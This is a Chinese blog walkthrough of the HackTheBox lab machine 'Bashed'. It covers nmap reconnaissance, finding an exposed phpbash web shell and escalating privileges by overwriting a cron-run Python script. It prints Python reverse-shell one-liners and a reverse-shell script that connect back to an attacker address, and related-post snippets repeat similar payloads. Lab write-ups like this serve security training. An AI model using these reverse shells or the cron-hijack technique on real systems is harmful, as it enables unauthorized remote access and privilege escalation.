HackTheBox::Bashed

最新推荐文章于 2024-01-22 21:17:07 发布
最新推荐文章于 2024-01-22 21:17:07 发布
阅读量504 收藏
点赞数
分类专栏: Hack The Box 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46743202/article/details/127261629
版权

0x00 信息收集

nmap -sV -Pn -A -T4 10.10.10.68

PORT     STATE    SERVICE VERSION
80/tcp   open     http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site
| vulners:
|   cpe:/a:apache:http_server:2.4.18:
|       CVE-2017-7679   7.5     https://vulners.com/cve/CVE-2017-7679
|       CVE-2017-7668   7.5     https://vulners.com/cve/CVE-2017-7668
|       CVE-2017-3169   7.5     https://vulners.com/cve/CVE-2017-3169
|       CVE-2017-3167   7.5     https://vulners.com/cve/CVE-2017-3167
|       CVE-2019-0211   7.2     https://vulners.com/cve/CVE-2019-0211
|       CVE-2018-1312   6.8     https://vulners.com/cve/CVE-2018-1312
|       CVE-2017-15715  6.8     https://vulners.com/cve/CVE-2017-15715
|       CVE-2019-10082  6.4     https://vulners.com/cve/CVE-2019-10082
|       CVE-2017-9788   6.4     https://vulners.com/cve/CVE-2017-9788
|       CVE-2019-0217   6.0     https://vulners.com/cve/CVE-2019-0217
|       CVE-2020-1927   5.8     https://vulners.com/cve/CVE-2020-1927
|       CVE-2019-10098  5.8     https://vulners.com/cve/CVE-2019-10098
|       CVE-2020-1934   5.0     https://vulners.com/cve/CVE-2020-1934
|       CVE-2019-0220   5.0     https://vulners.com/cve/CVE-2019-0220
|       CVE-2019-0196   5.0     https://vulners.com/cve/CVE-2019-0196
|       CVE-2018-17199  5.0     https://vulners.com/cve/CVE-2018-17199
|       CVE-2018-1333   5.0     https://vulners.com/cve/CVE-2018-1333
|       CVE-2017-9798   5.0     https://vulners.com/cve/CVE-2017-9798
|       CVE-2017-15710  5.0     https://vulners.com/cve/CVE-2017-15710
|       CVE-2016-8743   5.0     https://vulners.com/cve/CVE-2016-8743
|       CVE-2016-8740   5.0     https://vulners.com/cve/CVE-2016-8740
|       CVE-2016-4979   5.0     https://vulners.com/cve/CVE-2016-4979
|       CVE-2019-0197   4.9     https://vulners.com/cve/CVE-2019-0197
|       CVE-2019-10092  4.3     https://vulners.com/cve/CVE-2019-10092
|       CVE-2018-11763  4.3     https://vulners.com/cve/CVE-2018-11763
|       CVE-2016-4975   4.3     https://vulners.com/cve/CVE-2016-4975
|       CVE-2016-1546   4.3     https://vulners.com/cve/CVE-2016-1546
|       CVE-2018-1283   3.5     https://vulners.com/cve/CVE-2018-1283
|_      CVE-2016-8612   3.3     https://vulners.com/cve/CVE-2016-8612
4567/tcp filtered tram

先查看80端口的服务

尝试爆破路径,发现 http://10.10.10.68/dev/phpbash.php 可以执行命令

0x01 漏洞利用


反弹shell

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.14.40”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,“-i”]);’

0x02 权限提升

使用sudo -l查看一下基本权限

发现www-data可以直接切换到用户scriptmanager


通过scripts目录下的test.txt判断test.py每分钟执行一次

在本地创建test.py覆盖目标机器中的test.py

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.14.40",4445));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

hackthebox-bashed (考点:phpbash,linux修改脚本)
冬萍子癸水
04-11 667
nmap 就一个80. 打开看看都很直白提示了是phpbash 拿dirbuster扫一扫 看到phpbash,点进去。进入网页版bash 把这个shell弹到我本机来 命令有很多,但我试了几个没反应 最后这个OK python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);...
HackTheBox-Bashed渗透测试
weixin_43111940的博客
04-13 384
端口信息,只开了80端口 目录扫描 gobuster dir -u http://10.10.10.68 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x 'html,php,asp,aspx,zip,rar' /dev/目录下有php的shell文件 通过执行命令可以判断是Linux系统,因为对命令的大小写敏感 既然可以执行命令,尝试一下用反弹shell命令,尝试了php,Linux的反弹命令,但是没有拿到she
HTB-hackthebox-Bashed
yutianovo的博客
03-01 567
靶机描述 清单 信息搜集 nmap dirsearch 未受到保护的危险php文件 提权 sudo -l 定时脚本 信息搜集 靶机IP 端口扫描 nmap 10.10.10.68 Not shown: 999 closed ports PORT STATE SERVICE 80/tcp open http 80 页面内容如下 介绍了 phpbash https://github.com/Arrexel/phpbash 功能是在 Web 页面里可以像交互式shell 一样进行
Bashed -- hack the box
neal1991的专栏
04-04 564
IntroductionTarget: 10.10.10.68 (OS: Linux)Kali linux: 10.10.16.44Information Enumera...
Hack the box靶机 bashed
菜浪马废的博客
05-07 425
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.27",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subp...
murmurhash.c:MurmurHash3通用hash bashed查找函数实现
06-20
MurmurHash3通用hash bashed查找函数实现 关于 是一种非加密哈希函数,适用于一般的基于哈希的查找。 此实现实现了 MurmurHash 的第 3 版。 安装 : $ clib install jwerle/murmurhash.c 来源: $ git clone git@...
HTB靶场系列 Linux靶机 Bashed靶机
m0_57221101的博客
01-10 1411
勘探 惯例先用nmap扫描一下端口,发现开了80端口 ┌──(root????Mr)-[~/dirsearch] └─# nmap 10.10.10.68 Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-12 14:30 CST Nmap scan report for 10.10.10.68 Host is up (1.2s latency). Not shown: 999 closed ports PORT STATE SERVICE 80/
C1 Week 1:(2)Linear Regression with One Variable
最新发布
不蒸馒头的博客
01-22 1054
>Reg->Reg->->->for y.->->->The->->->->->->->->->->->->->->->->->->->->->->->->->Hopefully,->->->->->->【Optional】->->->->->->->————​​​​​​​——
hack the box靶场练习之bashed
qq_44767905的博客
02-06 354
hack the box靶场练习之bashed
Haystack - hack the box
neal1991的专栏
11-30 668
Introduction Target: 10.10.10.115(Linux) Kali: 10.10.16.61 HayStack is an easy box in hack the box. But it does isn't easy at all. It's annoying to find the user and password in the messy Spanis...
Linux/Blocky
ve9etable的博客
08-21 1933
。。。
vulhub:Raven2
qq_38618396的博客
09-26 765
基本信息 靶机 靶机地址: Download: https://drive.google.com/open?id=1fXp4JS8ANOeClnK63LwgKXl56BqFJ23z Download (Mirror): https://download.vulnhub.com/raven/Raven2.ova Download (Torrent): https://download.vulnhub.com/raven/Raven2.ova.torrent ( Magnet) 靶机难度:中等 靶机描述
Apache Solr 漏洞总结
星落的博客
04-15 1953
Apache Solr简介 Solr是一个高性能,采用Java5开发,基于Lucene的全文搜索服务器。Solr是一个独立的企业级搜索应用服务器,很多企业运用solr开源服务。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。它的主要特性包括:高效、灵活的缓存功能,垂直搜索功能,高亮显示搜索结果,通过索引复制来提高可用性,提 供一套强大Data Schema来定义字段,类型和设置文本分析,提供基于Web的管理界面等。 环境搭建 ..
vulhub:WTF
qq_38618396的博客
07-23 732
基本信息 靶机 靶机地址: 难度: 描述: 知识点、工具 nmap 0x00、信息收集 通过扫描网段,找到靶机的地址: 通过nmap扫描IP端口: 0x01、漏洞利用 0x02、权限提升
渗透测试5:VulnHub之election
d3f4ult的博客
07-09 1462
文章目录简介信息收集寻找提权点Is that CVE-2019-0211?Try again总结 简介 vulnhub最新的靶机之一election,虽然作者标的难度为medium(OSCP-like),但整个渗透下来其实比较简单的(2小时),可能难度就是寻找提权的点吧。 信息收集 root@kali:~/ctf/election# nmap -sC -sV 192.168.18.132 发现apache版本比较旧了,查看有没有相关的漏洞。 root@kali:~/ctf/election# nmap
pty/tty设备竞争条件漏洞 (CVE-2014-0196)
莫灰灰的专栏
09-09 6202
前置知识 1.      pty/tty。历史非常悠久的产物,主要用于终端的输入输出。介绍性的文章:http://www.linusakesson.net/programming/tty/ 2.      slab。主要用于分配特定大小的内存,防止内存碎片、空洞,有点类似windows内核里的Lookaside。百度百科相关文章:http://baike.baidu.com/view/5870
【Vulnhub靶机】DC-6
qq_40863723的博客
02-15 3422
多喝热水:http://hackergu.com 主机发现 ​ 使用netdiscover命令,发现主机IP为192.168.203.132 端口探测 ​ 使用Nmap,nmap -sV -A 192.168.203.132 --script=vuln。 ​ 探测结果: root@kali:~# nmap -sV -A 192.168.203.132 --script=vuln Starti...
CVE-2019-9766漏洞复现
玄道的网安博客
09-21 508
简介 Free MP3 CD Ripper是一款音频格式转换器。Free MP3 CD Ripper 2.6版本中存在缓冲区溢出漏洞。远程攻击者可以借助特制的以.mp3为后缀的文件,利用该漏洞执行任意代码。 环境搭建 1.攻击机:kali ip:192.168.111.129 2.靶机:windows10 安装Free MP3 CD Ripper 2.6版本 ip:192.168.3.20 ...
CVE-2020-1947: Apache ShardingSphere&UI远程代码执行漏洞通告
爱国小白帽
03-13 1127
CVE-2020-1947: Apache ShardingSphere&UI远程代码执行漏洞通告 360-CERT [360CERT](javascript:void(0)???? 昨天 0x01 漏洞背景 2020年3月11日,360CERT监测发现ShardingSphere官方发布4.0.1版本的更新公告,当攻击者在后台管理处提交恶意 yaml ,会被解析从而造成代码执行 Shardi...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值